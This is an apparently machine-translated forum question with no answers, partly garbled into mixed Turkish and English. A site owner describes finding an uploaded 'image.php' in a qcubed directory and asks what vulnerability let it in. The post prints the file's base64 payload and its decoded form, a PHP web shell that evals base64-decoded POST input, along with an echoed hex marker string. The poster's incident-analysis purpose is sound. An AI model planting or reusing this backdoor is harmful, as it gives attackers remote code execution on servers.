Güvenlik ihlali PHP eval (base64_decode

0 Cevap php

Tamam işte ben google'dan ne:

Bu qcubed dizinde yüklenen "image.php" adlı bir yüklenen dosya var gibi görünüyor.

Bu image.php dosyası aşağıdaki base64 kodu içerir:

aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzMxMzkzNjJlMzIzMzMxMmQzMTM3MzIyZTMyMzgzYTY5NjY2MTYzNjU3MjZkNzA3NTYyNmQ2OTYzNjUzYTYxNjY2MTYzMzQzMjY1NzI2OTMwMzInOw==

çözülen bu ekler:

if(isset($_POST['e']))

eval(base64_decode($_POST['e']));

echo '3139362e3233312d3137322e32383a6966616365726d7075626d6963653a6166616334326572693032';

Ben diğer sitelerde simillar qcubed açıkları tespit çıkartır dize için aranıyor.

I got son yankılandı dize kod çözme:

196.231-172.28:ifacermpubmice:afac42eri02

Gerçekten `t (: http://ostermiller.org/calc/encode.html kullanarak) ne anlamıyorum ki.

Can you please explain me what in particular I`m facing here? What security vulnerability I should adress in order to fix this?

0 Cevap